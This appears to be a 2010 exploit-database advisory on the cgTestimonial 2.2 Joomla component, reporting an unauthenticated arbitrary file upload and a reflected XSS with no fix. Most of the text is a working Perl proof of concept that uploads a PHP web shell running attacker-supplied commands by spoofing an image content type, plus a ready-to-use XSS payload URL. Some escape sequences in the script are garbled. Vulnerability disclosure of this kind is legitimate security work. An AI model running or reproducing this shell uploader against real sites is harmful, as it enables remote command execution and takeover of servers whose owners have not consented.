[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : Joomla Component cgTestimonial 2.2 Multiple Remote Vulnerabilities
# Published : 2010-08-06
# Author : Salvatore Fresta
# Previous Title : Tycoon CMS Record Script SQL Injection Vulnerability
# Next Title : wizmall 6.4 CSRF Vulnerabilities
cgTestimonial 2.2 Joomla Component Multiple Remote Vulnerabilities
Name cgTestimonial
Vendor http://www.cmsgalaxy.com
Versions Affected 2.2
Author Salvatore Fresta aka Drosophila
Website http://www.salvatorefresta.net
Contact salvatorefresta [at] gmail [dot] com
Date 2010-08-06
X. INDEX
I. ABOUT THE APPLICATION
II. DESCRIPTION
III. ANALYSIS
IV. SAMPLE CODE
V. FIX
I. ABOUT THE APPLICATION
________________________
cg_Testimonial component is a tool for adding
testimonial by the user from frontend and managing and
publishing testimonials from backend.
This Joomla extension allows website user to submit a
testimonials form with several fields on one of your
site's page and enable adding testimonials by either
users or admin.
II. DESCRIPTION
_______________
Some parameters are not properly sanitised.The following
vulnerabilities can be exploited from guest users.
III. ANALYSIS
_____________
Summary:
A) Multiple Arbitrary File Upload
B) XSS
A) Multiple Arbitrary File Upload
_________________________________
The usr_img parameter in cgtestimonial.php (frontend)
and in testimonial.php (admin, without checks) is not
properly sanitised. A check is executed on the content-
type HTTP field.
B) XSS
______
The url parameter in video.php is not properly sanitised
before being printed on screen.
IV. SAMPLE CODE
_______________
A) Multiple Arbitrary File Upload
http://poc.salvatorefresta.net/PoC-cgTestimonial2.2.pl.txt
B) XSS
http://site/path/components/com_cgtestimonial/video.php?url="><script>alert('xss');</script>
V. FIX
______
No fix.
################################ PoC-cgTestimonial2.2.pl ################################
#!/usr/bin/perl
#
# PoC - Remote PHP Shell Upload - cgTestimonial 2.2 Joomla Component
#
# Author: Salvatore Fresta aka Drosophila
# Email: salvatorefresta@gmail.com
#
# Date: 06 August 2010
#
# http://target/path/components/com_cgtestimonial/user_images/filename?cmd=command
#
use IO::Socket;
$usage = "ncgTestimonial 2.2 Remote PHP Shell Upload - (c) Salvatore Frestan".
"http://www.salvatorefresta.netnn".
"Usage: perl PoC-cgTestimonial.pl <hostname> <path>nn";
$#ARGV == 1 || die $usage;
my $host = $ARGV[0];
my $path = $ARGV[1];
my $stop = 0;
my $rand = "master".int(rand 150);
my $shell = "<?php echo "<pre>"; system($_GET['cmd']); echo "</pre>"; ?>";
my $filename = "evil.php";
my $code = "--AaB03xrn".
"Content-Disposition: form-data; name="usr_img"; filename="$filename"rn".
"Content-Type: image/jpegrn".
"rn".
"$shellrn".
"--AaB03x--";
my $pkg = "POST ".$path."index.php?option=com_cgtestimonial&task=submit HTTP/1.1rn".
"Host: $hostrn".
"Content-Type: multipart/form-data; boundary=AaB03xrn".
"Content-Length: " .length($code). "rn".
"rn".
$code;
my $socket = new IO::Socket::INET( Proto=> "tcp",
PeerAddr=> $host,
PeerPort=> "80"
) or die "n[-] Unable to connect to $hostnn";
print "n[+] Connectedn";
print $socket $pkg;
$pkg = "GET ".$path."components/com_cgtestimonial/user_images/".$filename." HTTP/1.1rn".
"Host: $hostrnrn";
print $socket $pkg;
while ((my $rec = <$socket>) && $stop != 1) {
if($rec !=~ /302 Found/) {
$stop = 1;
}
}
if($stop != 1) {
print "[-] Shell not uploadedn";
close($socket);
exit;
}
print "[+] Shell uploaded on ".$host.$path."components/com_cgtestimonial/user_images/".$filename."n".
"[+] Disconnectednn";
close($socket);